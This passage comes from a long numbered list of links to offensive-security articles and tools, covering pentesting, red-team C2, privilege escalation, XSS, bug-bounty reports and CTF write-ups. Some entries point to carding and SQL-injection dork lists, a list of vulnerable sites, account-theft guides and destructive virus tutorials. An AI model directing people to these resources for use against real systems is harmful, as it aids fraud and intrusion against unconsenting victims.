http://www.hackingarticles.in/post-exploitation-using-wmic-system-command
-464-Privilege Escalation in Linux using etc/passwd file:
http://www.hackingarticles.in/privilege-escalation-in-linux-using-etc-passwd-file
-465-RDP Pivoting with Metasploit:
http://www.hackingarticles.in/rdp-pivoting-metasploit
-466-A New Way to Hack Remote PC using Xerosploit and Metasploit:
http://www.hackingarticles.in/new-way-hack-remote-pc-using-xerosploit-metasploit
-467-Shell to Meterpreter using Session Command:
http://www.hackingarticles.in/shell-meterpreter-using-session-command
-468-SMTP Pentest Lab Setup in Ubuntu (Port 25):
http://www.hackingarticles.in/smtp-pentest-lab-setup-ubuntu
-469-SNMP Lab Setup and Penetration Testing:
http://www.hackingarticles.in/snmp-lab-setup-and-penetration-testing
-470-SQL Injection Exploitation in Multiple Targets using Sqlmap:
http://www.hackingarticles.in/sql-injection-exploitation-multiple-targets-using-sqlmap
-471-Sql Injection Exploitation with Sqlmap and Burp Suite (Burp CO2 Plugin):
http://www.hackingarticles.in/sql-injection-exploitation-sqlmap-burp-suite-burp-co2-plugin
-472-SSH Penetration Testing (Port 22):
http://www.hackingarticles.in/ssh-penetration-testing-port-22
-473-Manual Post Exploitation on Windows PC (System Command):
http://www.hackingarticles.in/manual-post-exploitation-windows-pc-system-command
-474-SSH Pivoting using Meterpreter:
http://www.hackingarticles.in/ssh-pivoting-using-meterpreter
-475-Stealing Windows Credentials of Remote PC with MS Office Document:
http://www.hackingarticles.in/stealing-windows-credentials-remote-pc-ms-office-document
-476-Telnet Pivoting through Meterpreter:
http://www.hackingarticles.in/telnet-pivoting-meterpreter
-477-Hack Password using Rogue Wi-Fi Access Point Attack (WiFi-Pumpkin):
http://www.hackingarticles.in/hack-password-using-rogue-wi-fi-access-point-attack-wifi-pumpkin
-478-Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit:
http://www.hackingarticles.in/hack-remote-pc-using-fake-updates-scam-with-ettercap-and-metasploit
-479-Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit:
http://www.hackingarticles.in/hack-remote-windows-10-password-plain-text-using-wdigest-credential-caching-exploit
-480-Hack Remote Windows 10 PC using TheFatRat:
http://www.hackingarticles.in/hack-remote-windows-10-pc-using-thefatrat
-481-2 Ways to Hack Windows 10 Password Easy Way:
http://www.hackingarticles.in/hack-windows-10-password-easy-way
-482-How to Change ALL Files Extension in Remote PC (Confuse File Extensions Attack):
http://www.hackingarticles.in/how-to-change-all-files-extension-in-remote-pc-confuse-file-extensions-attack
-483-How to Delete ALL Files in Remote Windows PC:
http://www.hackingarticles.in/how-to-delete-all-files-in-remote-windows-pc-2
-484-How to Encrypt Drive of Remote Victim PC:
http://www.hackingarticles.in/how-to-encrypt-drive-of-remote-victim-pc
-485-Post Exploitation in Linux With Metasploit:
https://pentestlab.blog/2013/01/04/post-exploitation-in-linux-with-metasploit
-486-Red Team:
https://posts.specterops.io/tagged/red-team?source=post
-487-Code Signing Certi cate Cloning Attacks and Defenses:
https://posts.specterops.io/tagged/code-signing?source=post
-488-Phishing:
https://posts.specterops.io/tagged/phishing?source=post
-489-PowerPick – A ClickOnce Adjunct:
http://www.sixdub.net/?p=555
-490-sql-injection-xss-playground:
https://ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground
-491-Privilege Escalation & Post-Exploitation:
https://github.com/rmusser01/Infosec_Reference/raw/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md
-492-https-payload-and-c2-redirectors:
https://posts.specterops.io/https-payload-and-c2-redirectors-ff8eb6f87742?source=placement_card_footer_grid---------2-41
-493-a-push-toward-transparency:
https://posts.specterops.io/a-push-toward-transparency-c385a0dd1e34?source=placement_card_footer_grid---------0-41
-494-bloodhound:
https://posts.specterops.io/tagged/bloodhound?source=post
-495-active directory:
https://posts.specterops.io/tagged/active-directory?source=post
-496-Load & Execute Bundles with migrationTool:
https://posts.specterops.io/load-execute-bundles-with-migrationtool-f952e276e1a6?source=placement_card_footer_grid---------1-41
-497-Outlook Forms and Shells:
https://sensepost.com/blog/2017/outlook-forms-and-shells/
-498-Tools:
https://sensepost.com/blog/tools/
-499-2018 pentesting resources:
https://sensepost.com/blog/2018/
-500-network pentest:
https://securityonline.info/category/penetration-testing/network-pentest/
-501-[technical] Pen-testing resources:
https://medium.com/p/cd01de9036ad
-502-Stored XSS on Facebook:
https://opnsec.com/2018/03/stored-xss-on-facebook/
-503-vulnerabilities:
https://www.brokenbrowser.com/category/vulnerabilities/
-504-Extending BloodHound: Track and Visualize Your Compromise:
https://porterhau5.com/.../extending-bloodhound-track-and-visualize-your-compromise
-505-so-you-want-to-be-a-web-security-researcher:
https://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher
-506-BugBounty — AWS S3 added to my “Bucket” list!:
https://medium.com/p/f68dd7d0d1ce
-507-BugBounty — API keys leakage, Source code disclosure in India’s largest e-commerce health care company:
https://medium.com/p/c75967392c7e
-508-BugBounty — Exploiting CRLF Injection can lands into a nice bounty:
https://medium.com/p/159525a9cb62
-509-BugBounty — How I was able to bypass rewall to get RCE and then went from server shell to get root user account:
https://medium.com/p/783f71131b94
-510-BugBounty — “I don’t need your current password to login into youraccount” - How could I completely takeover any user’s account in an online classi ed ads company:
https://medium.com/p/e51a945b083d
-511-Ping Power — ICMP Tunnel:
https://medium.com/bugbountywriteup/ping-power-icmp-tunnel-31e2abb2aaea?source=placement_card_footer_grid---------1-41
-512-hacking:
https://www.nextleveltricks.com/hacking/
-513-Top 8 Best YouTube Channels To Learn Ethical Hacking Online !:
https://www.nextleveltricks.com/youtube-channels-to-learn-hacking/
-514-Google Dorks List 2018 | Fresh Google Dorks 2018 for SQLi:
https://www.nextleveltricks.com/latest-google-dorks-list/
-515-Art of Shellcoding: Basic AES Shellcode Crypter:
http://www.nipunjaswal.com/2018/02/shellcode-crypter.html
-516-Big List Of Google Dorks Hacking:
https://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking/
-517-nmap-cheatsheet:
https://bitrot.sh/cheatsheet/09-12-2017-nmap-cheatsheet/
-518-Aws Recon:
https://enciphers.com/tag/aws-recon/
-519-Recon:
https://enciphers.com/tag/recon/
-520-Subdomain Enumeration:
https://enciphers.com/tag/subdomain-enumeration/
-521-Shodan:
https://enciphers.com/tag/shodan/
-522-Dump LAPS passwords with ldapsearch:
https://malicious.link/post/2017/dump-laps-passwords-with-ldapsearch/
-523-peepdf - PDF Analysis Tool:
http://eternal-todo.com/tools/peepdf-pdf-analysis-tool
-524-Evilginx 2 - Next Generation of Phishing 2FA Tokens:
breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/
-526-Evil XML with two encodings:
https://mohemiv.com/all/evil-xml/
-527-create-word-macros-with-powershell:
https://4sysops.com/archives/create-word-macros-with-powershell/
-528-Excess XSS A comprehensive tutorial on cross-site scripting:
https://excess-xss.com/
-529-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts:
https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
-530-Abusing DCOM For Yet Another Lateral Movement Technique:
https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/
-531-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation:
https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/
-532-Abusing DCOM For Yet Another Lateral Movement Technique:
https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/
-533-“Practical recon techniques for bug hunters & pen testers”:
https://blog.appsecco.com/practical-recon-techniques-for-bug-hunters-pen-testers-at-levelup-0x02-b72c15641972?source=placement_card_footer_grid---------2-41
-534-Exploiting Node.js deserialization bug for Remote Code Execution:
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
-535-Exploiting System Shield AntiVirus Arbitrary Write Vulnerability using SeTakeOwnershipPrivilege:
http://www.greyhathacker.net/?p=1006
-536-Running Macros via ActiveX Controls:
http://www.greyhathacker.net/?p=948
-537-all=BUG+MALWARE+EXPLOITS
http://www.greyhathacker.net/?cat=18
-538-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND:
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking
-539-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP:
https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
-540-A Look at CVE-2017-8715: Bypassing CVE-2017-0218 using PowerShell Module Manifests:
https://enigma0x3.net/2017/11/06/a-look-at-cve-2017-8715-bypassing-cve-2017-0218-using-powershell-module-manifests/
-541-“FILELESS” UAC BYPASS USING SDCLT.EXE:
https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe
-542-File Upload XSS:
https://medium.com/p/83ea55bb9a55
-543-Firebase Databases:
https://medium.com/p/f651a7d49045
-544-Safe Red Team Infrastructure:
https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac
-545-RED-TEAM:
https://cybersyndicates.com/tags/red-team/
-546-Egressing Bluecoat with Cobaltstike & Let's Encrypt:
https://www.youtube.com/watch?v=cgwfjCmKQwM
-547-Veil-Evasion:
https://cybersyndicates.com/tags/veil-evasion/
-548-Dangerous Virus For Windows Crashes Everything Hack window Using Virus:
http://thelearninghacking.com/create-virus-hack-windows/
-549-Download Google Dorks List 2019:
https://medium.com/p/323c8067502c
-550-Don’t leak sensitive data via security scanning tools:
https://medium.com/p/7d1f715f0486
-551-CRLF Injection Into PHP’s cURL Options:
https://medium.com/@tomnomnom/crlf-injection-into-phps-curl-options-e2e0d7cfe545?source=placement_card_footer_grid---------0-60
-552-Open Redirects & Security Done Right!:
https://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496?source=placement_card_footer_grid---------2-60
-553-DOM XSS – auth.uber.com:
https://stamone-bug-bounty.blogspot.com/2017/10/dom-xss-auth_14.html
-554-PowerPoint and Custom Actions:
https://cofense.com/powerpoint-and-custom-actions/
-555-exploiting-adobe-coldfusion:
https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html
-556-Command and Control – HTTPS:
https://pentestlab.blog/2017/10/04/command-and-control-https
-557-Command and Control – Images:
https://pentestlab.blog/2018/01/02/command-and-control-images
-558-Command and Control – JavaScript:
https://pentestlab.blog/2018/01/08/command-and-control-javascript
-559-XSS-Payloads:
https://github.com/Pgaijin66/XSS-Payloads
-560-Command and Control – Web Interface:
https://pentestlab.blog/2018/01/03/command-and-control-web-interface
-561-Command and Control – Website:
https://pentestlab.blog/2017/11/14/command-and-control-website
-562-Command and Control – WebSocket:
https://pentestlab.blog/2017/12/06/command-and-control-websocket
-563-atomic-red-team:
https://github.com/redcanaryco/atomic-red-team
-564-PowerView-3.0-tricks.ps1:
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
-565-awesome-sec-talks:
https://github.com/PaulSec/awesome-sec-talks
-566-Awesome-Red-Teaming:
https://github.com/yeyintminthuhtut/Awesome-Red-Teaming
-567-awesome-php:
https://github.com/ziadoz/awesome-php
-568-latest-hacks:
https://hackercool.com/latest-hacks/
-569-GraphQL NoSQL Injection Through JSON Types:
http://www.east5th.co/blog/2017/06/12/graphql-nosql-injection-through-json-types/
-570-Writing .NET Executables for Pentesters:
https://www.peew.pw/blog/2017/12/4/writing-net-executables-for-penteters-part-2
-571-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis.
https://github.com/secfigo/Awesome-Fuzzing
-572-How to Shutdown, Restart, Logoff, and Hibernate Remote Windows PC:
http://www.hackingarticles.in/how-to-shutdown-restart-logoff-and-hibernate-remote-windows-pc
-572-Injecting Metasploit Payloads into Android Applications – Manually:
https://pentestlab.blog/2017/06/26/injecting-metasploit-payloads-into-android-applications-manually
-573-Google Dorks For Carding [Huge List] - Part 1:
https://hacker-arena.blogspot.com/2014/03/google-dorks-for-carding-huge-list-part.html
-574-Google dorks for growth hackers:
https://medium.com/p/7f83c8107057
-575-Google Dorks For Carding (HUGE LIST):
https://leetpedia.blogspot.com/2013/01/google-dorks-for-carding-huge-list.html
-576-BIGGEST SQL Injection Dorks List ~ 20K+ Dorks:
https://leetpedia.blogspot.com/2013/05/biggest-sql-injection-dorks-list-20k.html
-577-Pastebin Accounts Hacking (Facebook/Paypal/LR/Gmail/Yahoo, etc):
https://leetpedia.blogspot.com/2013/01/pastebin-accounts-hacking.html
-578-How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!:
http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
-579-Hijacking VNC (Enum, Brute, Access and Crack):
https://medium.com/p/d3d18a4601cc
-580-Linux Post Exploitation Command List:
https://github.com/mubix/post-exploitation/wiki
-581-List of google dorks for sql injection:
https://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/
-582-Microsoft Office – NTLM Hashes via Frameset:
https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset
-583-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass:
https://www.exploit-db.com/download/44888.txt
-584-Microsoft Windows CVE-2018-8210 Remote Code Execution Vulnerability:
https://www.securityfocus.com/bid/104407
-585-Microsoft Windows Kernel CVE-2018-0982 Local Privilege Escalation Vulnerability:
https://www.securityfocus.com/bid/104382
-586-miSafes Mi-Cam Device Hijacking:
https://packetstormsecurity.com/files/146504/SA-20180221-0.txt
-587-Low-Level Windows API Access From PowerShell:
https://www.fuzzysecurity.com/tutorials/24.html
-588-Linux Kernel 'mm/hugetlb.c' Local Denial of Service Vulnerability:
https://www.securityfocus.com/bid/103316
-589-Lateral Movement – RDP:
https://pentestlab.blog/2018/04/24/lateral-movement-rdp/
-590-Snagging creds from locked machines:
https://malicious.link/post/2016/snagging-creds-from-locked-machines/
-591-Making a Blind SQL Injection a Little Less Blind:
https://medium.com/p/428dcb614ba8
-592-VulnHub — Kioptrix: Level 5:
https://medium.com/@bondo.mike/vulnhub-kioptrix-level-5-88ab65146d48?source=placement_card_footer_grid---------1-60
-593-Unauthenticated Account Takeover Through HTTP Leak:
https://medium.com/p/33386bb0ba0b
-594-Hakluke’s Ultimate OSCP Guide: Part 1 — Is OSCP for you?:
https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440?source=placement_card_footer_grid---------2-43
-595-Finding Target-relevant Domain Fronts:
https://medium.com/@vysec.private/finding-target-relevant-domain-fronts-7f4ad216c223?source=placement_card_footer_grid---------0-44
-596-Safe Red Team Infrastructure:
https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac?source=placement_card_footer_grid---------1-60
-597-Cobalt Strike Visualizations:
https://medium.com/@001SPARTaN/cobalt-strike-visualizations-e6a6e841e16b?source=placement_card_footer_grid---------2-60
-598-OWASP Top 10 2017 — Web Application Security Risks:
https://medium.com/p/31f356491712
-599-XSS-Auditor — the protector of unprotected:
https://medium.com/bugbountywriteup/xss-auditor-the-protector-of-unprotected-f900a5e15b7b?source=placement_card_footer_grid---------0-60
-600-Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine:
https://gbhackers.com/netcat-vs-cryptcat
-601-Jenkins Servers Infected With Miner.:
https://medium.com/p/e370a900ab2e
-602-cheat-sheet:
http://pentestmonkey.net/category/cheat-sheet
-603-Command and Control – Website Keyword:
https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/
-604-Command and Control – Twitter:
https://pentestlab.blog/2017/09/26/command-and-control-twitter/
-605-Command and Control – Windows COM:
https://pentestlab.blog/2017/09/01/command-and-control-windows-com/
-606-Microsoft Office – NTLM Hashes via Frameset:
https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/
-607-PHISHING AGAINST PROTECTED VIEW:
https://enigma0x3.net/2017/07/13/phishing-against-protected-view/
-608-PHISHING WITH EMPIRE:
https://enigma0x3.net/2016/03/15/phishing-with-empire/
-609-Reverse Engineering Android Applications:
https://pentestlab.blog/2017/02/06/reverse-engineering-android-applications/
-610-HTML Injection:
https://pentestlab.blog/2013/06/26/html-injection/
-611-Meterpreter stage AV/IDS evasion with powershell:
https://arno0x0x.wordpress.com/2016/04/13/meterpreter-av-ids-evasion-powershell/
-612-Windows Atomic Tests by ATT&CK Tactic & Technique:
https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/windows-index.md
-613-Windows Active Directory Post Exploitation Cheatsheet:
https://medium.com/p/48c2bd70388
-614-Windows 10 UAC Loophole Can Be Used to Infect Systems with Malware:
http://news.softpedia.com/news/windows-10-uac-loophole-can-be-used-to-infect-systems-with-malware-513996.shtml
-615-How to Bypass Anti-Virus to Run Mimikatz:
https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/
-616-Userland API Monitoring and Code Injection Detection:
https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565
-617-USE TOR. USE EMPIRE.:
http://secureallthethings.blogspot.com/2016/11/use-tor-use-empire.html
-617-ADVANCED CROSS SITE SCRIPTING (XSS) CHEAT SHEET:
https://www.muhaddis.info/advanced-cross-site-scripting-xss-cheat-sheet/
-618-Empire without PowerShell.exe:
https://bneg.io/2017/07/26/empire-without-powershell-exe/
-619-RED TEAM:
https://bneg.io/category/red-team/
-620-PDF Tools:
https://blog.didierstevens.com/programs/pdf-tools/
-621-DNS Data ex ltration — What is this and How to use?
https://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822
-621-Google Dorks:
https://medium.com/p/7cfd432e0cf3
-622-Hacking with JSP Shells:
https://blog.netspi.com/hacking-with-jsp-shells/
-623-Malware Analysis:
https://github.com/RPISEC/Malware/raw/master/README.md
-624-A curated list of Capture The Flag (CTF) frameworks, libraries, resources and softwares.:
https://github.com/SandySekharan/CTF-tool
-625-Group Policy Preferences:
https://pentestlab.blog/2017/03/20/group-policy-preferences
-627-CHECKING FOR MALICIOUSNESS IN AC OFORM OBJECTS ON PDF FILES:
https://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files
-628-deobfuscation:
https://furoner.wordpress.com/tag/deobfuscation/
-629-POWERSHELL EMPIRE STAGERS 1: PHISHING WITH AN OFFICE
MACRO AND EVADING AVS:
https://fzuckerman.wordpress.com/2016/10/06/powershell-empire-stagers-1-phishing-with-an-office-macro-and-evading-avs/
-630-A COMPREHENSIVE TUTORIAL ON CROSS-SITE SCRIPTING:
https://fzuckerman.wordpress.com/2016/10/06/a-comprehensive-tutorial-on-cross-site-scripting/
-631-GCAT – BACKDOOR EM PYTHON:
https://fzuckerman.wordpress.com/2016/10/06/gcat-backdoor-em-python/
-632-Latest Carding Dorks List for Sql njection 2019:
https://latestechnews.com/carding-dorks/
-633-google docs for credit card:
https://latestechnews.com/tag/google-docs-for-credit-card/
-634-How To Scan Multiple Organizations
With Shodan and Golang (OSINT):
https://medium.com/p/d994ba6a9587
-635-How to Evade Application
Whitelisting Using REGSVR32:
https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/
-636-phishing:
https://www.blackhillsinfosec.com/tag/phishing/
-637-Merlin in action: Intro to Merlin:
https://asciinema.org/a/ryljo8qNjHz1JFcFDK7wP6e9I
-638-IP Cams from around the world:
https://medium.com/p/a6f269f56805
-639-Advanced Cross Site Scripting(XSS) Cheat Sheet by
Jaydeep Dabhi:
https://jaydeepdabhi.wordpress.com/2016/01/12/advanced-cross-site-scriptingxss-cheat-sheet-by-jaydeep-dabhi/
-640-Just how easy it is to do a domain or
subdomain take over!?:
https://medium.com/p/265d635b43d8
-641-How to Create hidden user in Remote PC:
http://www.hackingarticles.in/create-hidden-remote-metaspolit
-642-Process Doppelgänging – a new way to impersonate a process:
https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/
-643-How to turn a DLL into astandalone EXE:
https://hshrzd.wordpress.com/2016/07/21/how-to-turn-a-dll-into-a-standalone-exe/
-644-Hijacking extensions handlers as a malware persistence method:
https://hshrzd.wordpress.com/2017/05/25/hijacking-extensions-handlers-as-a-malware-persistence-method/
-645-I'll Get Your Credentials ... Later!:
https://www.fuzzysecurity.com/tutorials/18.html
-646-Game Over: CanYouPwnMe > Kevgir-1:
https://www.fuzzysecurity.com/tutorials/26.html
-647-IKARUS anti.virus and its 9 exploitable kernel vulnerabilities:
http://www.greyhathacker.net/?p=995
-648-Getting started in Bug Bounty:
https://medium.com/p/7052da28445a
-649-Union SQLi Challenges (Zixem Write-up):
https://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4?source=placement_card_footer_grid---------2-60
-650-scanless – A Tool for Perform Anonymous Port Scan on Target Websites:
https://gbhackers.com/scanless-port-scans-websites-behalf
-651-WEBAPP PENTEST:
https://securityonline.info/category/penetration-testing/webapp-pentest/
-652-Cross-Site Scripting (XSS) Payloads:
https://securityonline.info/tag/cross-site-scripting-xss-payloads/
-653-sg1: swiss army knife for data encryption, exfiltration & covert communication:
https://securityonline.info/tag/sg1/
-654-NETWORK PENTEST:
https://securityonline.info/category/penetration-testing/network-pentest/
-655-SQL injection in an UPDATE query - a bug bounty story!:
https://zombiehelp54.blogspot.com/2017/02/sql-injection-in-update-query-bug.html
-656-Cross-site Scripting:
https://www.netsparker.com/blog/web-security/cross-site-scripting-xss/
-657-Local File Inclusion:
https://www.netsparker.com/blog/web-security/local-file-inclusion-vulnerability/
-658-Command Injection:
https://www.netsparker.com/blog/web-security/command-injection-vulnerability/
-659-a categorized list of Windows CMD commands:
https://ss64.com/nt/commands.html
-660-Understanding Guide for Nmap Timing Scan (Firewall Bypass):
http://www.hackingarticles.in/understanding-guide-nmap-timing-scan-firewall-bypass
-661-RFID Hacking with The Proxmark 3:
https://blog.kchung.co/tag/rfid/
-662-A practical guide to RFID badge copying:
https://blog.nviso.be/2017/01/11/a-practical-guide-to-rfid-badge-copying
-663-Denial of Service using Cookie Bombing:
https://medium.com/p/55c2d0ef808c
-664-Vultr Domain Hijacking:
https://vincentyiu.co.uk/red-team/cloud-security/vultr-domain-hijacking
-665-Command and Control:
https://vincentyiu.co.uk/red-team/domain-fronting
-666-Cisco Auditing Tool & Cisco Global Exploiter to Exploit 14 Vulnerabilities in Cisco Switches and Routers:
https://gbhackers.com/cisco-global-exploiter-cge
-667-CHECKING FOR MALICIOUSNESS IN ACROFORM OBJECTS ON PDF FILES:
https://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files
-668-Situational Awareness:
https://pentestlab.blog/2018/05/28/situational-awareness/
-669-Unquoted Service Path:
https://pentestlab.blog/2017/03/09/unquoted-service-path
-670-NFS:
https://pentestacademy.wordpress.com/2017/09/20/nfs/
-671-List of Tools for Pentest Rookies:
https://pentestacademy.wordpress.com/2016/09/20/list-of-tools-for-pentest-rookies/
-672-Common Windows Commands for Pentesters:
https://pentestacademy.wordpress.com/2016/06/21/common-windows-commands-for-pentesters/
-673-Open-Source Intelligence (OSINT) Reconnaissance:
https://medium.com/p/75edd7f7dada
-674-OSINT x UCCU Workshop on Open Source Intelligence:
https://www.slideshare.net/miaoski/osint-x-uccu-workshop-on-open-source-intelligence
-675-Advanced Attack Techniques:
https://www.cyberark.com/threat-research-category/advanced-attack-techniques/
-676-Credential Theft:
https://www.cyberark.com/threat-research-category/credential-theft/
-678-The Cloud Shadow Admin Threat: 10 Permissions to Protect:
https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/
-679-Online Credit Card Theft: Today’s Browsers Store Sensitive Information Deficiently, Putting User Data at Risk:
https://www.cyberark.com/threat-research-blog/online-credit-card-theft-todays-browsers-store-sensitive-information-deficiently-putting-user-data-risk/
-680-Weakness Within: Kerberos Delegation:
https://www.cyberark.com/threat-research-blog/weakness-within-kerberos-delegation/
-681-Simple Domain Fronting PoC with GAE C2 server:
https://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/
-682-Find Critical Information about a Host using DMitry:
https://www.thehackr.com/find-critical-information-host-using-dmitry/
-683-How To Do OS Fingerprinting In Kali Using Xprobe2:
http://disq.us/?url=http%3A%2F%2Fwww.thehackr.com%2Fos-fingerprinting-kali%2F&key=scqgRVMQacpzzrnGSOPySA
-684-Crack SSH, FTP, Telnet Logins Using Hydra:
https://www.thehackr.com/crack-ssh-ftp-telnet-logins-using-hydra/
-685-Reveal Saved Passwords in Browser using JavaScript Injection:
https://www.thehackr.com/reveal-saved-passwords-browser-using-javascript-injection/
-686-Nmap Cheat Sheet:
https://s3-us-west-2.amazonaws.com/stationx-public-download/nmap_cheet_sheet_0.6.pdf
-687-Manual Post Exploitation on Windows PC (Network Command):
http://www.hackingarticles.in/manual-post-exploitation-windows-pc-network-command
-688-Hack Gmail or Facebook Password of Remote PC using NetRipper Exploitation Tool:
http://www.hackingarticles.in/hack-gmail-or-facebook-password-of-remote-pc-using-netripper-exploitation-tool
-689-Hack Locked Workstation Password in Clear Text:
http://www.hackingarticles.in/hack-locked-workstation-password-clear-text
-690-How to Find ALL Excel, Office, PDF, and Images in Remote PC:
http://www.hackingarticles.in/how-to-find-all-excel-office-pdf-images-files-in-remote-pc
-691-red-teaming:
https://www.redteamsecure.com/category/red-teaming/
-692-Create a Fake AP and Sniff Data mitmAP:
http://www.uaeinfosec.com/create-fake-ap-sniff-data-mitmap/
-693-Bruteforcing From Nmap Output BruteSpray:
http://www.uaeinfosec.com/bruteforcing-nmap-output-brutespray/
-694-Reverse Engineering Framework radare2:
http://www.uaeinfosec.com/reverse-engineering-framework-radare2/
-695-Automated ettercap TCP/IP Hijacking Tool Morpheus:
http://www.uaeinfosec.com/automated-ettercap-tcpip-hijacking-tool-morpheus/
-696-List Of Vulnerable SQL Injection Sites:
https://www.blogger.com/share-post.g?blogID=1175829128367570667&postID=4652029420701251199
-697-Command and Control – Gmail:
https://pentestlab.blog/2017/08/03/command-and-control-gmail/
-698-Command and Control – DropBox:
https://pentestlab.blog/2017/08/29/command-and-control-dropbox/
-699-Skeleton Key:
https://pentestlab.blog/2018/04/10/skeleton-key/
-700-Secondary Logon Handle:
https://pentestlab.blog/2017/04/07/secondary-logon-handle
-701-Hot Potato:
https://pentestlab.blog/2017/04/13/hot-potato
-702-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2):
https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
-703-Linux-Kernel-exploits:
http://tacxingxing.com/category/exploit/kernel-exploit/
-704-Linux-Kernel-Exploit Stack Smashing:
http://tacxingxing.com/2018/02/26/linuxkernelexploit-stack-smashing/
-705-Linux Kernel Exploit Environment:
http://tacxingxing.com/2018/02/15/linuxkernelexploit-huan-jing-da-jian/
-706-Linux-Kernel-Exploit NULL dereference:
http://tacxingxing.com/2018/02/22/linuxkernelexploit-null-dereference/
-707-Apache mod_python for red teams:
https://labs.nettitude.com/blog/apache-mod_python-for-red-teams/
-708-Bounty Write-up (HTB):
https://medium.com/p/9b01c934dfd2/
709-CTF Writeups:
https://medium.com/ctf-writeups
-710-Detecting Malicious Microsoft Office Macro Documents:
http://www.greyhathacker.net/?p=872
-711-SQL injection in Drupal:
https://hackerone.com/reports/31756
-712-XSS and open redirect on Twitter:
https://hackerone.com/reports/260744
-713-Shopify login open redirect:
https://hackerone.com/reports/55546
-714-HackerOne interstitial redirect:
https://hackerone.com/reports/111968
-715-Ubiquiti sub-domain takeovers:
https://hackerone.com/reports/181665
-716-Scan.me pointing to Zendesk:
https://hackerone.com/reports/114134
-717-Starbucks' sub-domain takeover:
https://hackerone.com/reports/325336
-718-Vine's sub-domain takeover:
https://hackerone.com/reports/32825
-719-Uber's sub-domain takeover:
https://hackerone.com/reports/175070
-720-Read access to Google:
https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/
-721-A Facebook XXE with Word:
https://www.bram.us/2014/12/29/how-i-hacked-facebook-with-a-word-document/
-722-The Wikiloc XXE:
https://www.davidsopas.com/wikiloc-xxe-vulnerability/
-723-Uber Jinja2 TTSI:
https://hackerone.com/reports/125980
-724-Uber Angular template injection:
https://hackerone.com/reports/125027
-725-Yahoo Mail stored XSS:
https://klikki.fi/adv/yahoo2.html
-726-Google image search XSS:
https://mahmoudsec.blogspot.com/2015/09/how-i-found-xss-vulnerability-in-google.html
-727-Shopify Giftcard Cart XSS :
https://hackerone.com/reports/95089
-728-Shopify wholesale XSS :
https://hackerone.com/reports/106293
-729-Bypassing the Shopify admin authentication:
https://hackerone.com/reports/270981
-730-Starbucks race conditions:
https://sakurity.com/blog/2015/05/21/starbucks.html
-731-Binary.com vulnerability – stealing a user's money:
https://hackerone.com/reports/98247
-732-HackerOne signal manipulation:
https://hackerone.com/reports/106305
-733-Shopify S buckets open:
https://hackerone.com/reports/98819
-734-HackerOne S buckets open:
https://hackerone.com/reports/209223
-735-Bypassing the GitLab 2F authentication:
https://gitlab.com/gitlab-org/gitlab-ce/issues/14900
-736-Yahoo PHP info disclosure:
https://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/
-737-Shopify for exporting installed users:
https://hackerone.com/reports/96470
-738-Shopify Twitter disconnect:
https://hackerone.com/reports/111216
-739-Badoo full account takeover:
https://hackerone.com/reports/127703
-740-Disabling PS Logging:
https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs
-741-macro-less-code-exec-in-msword:
https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
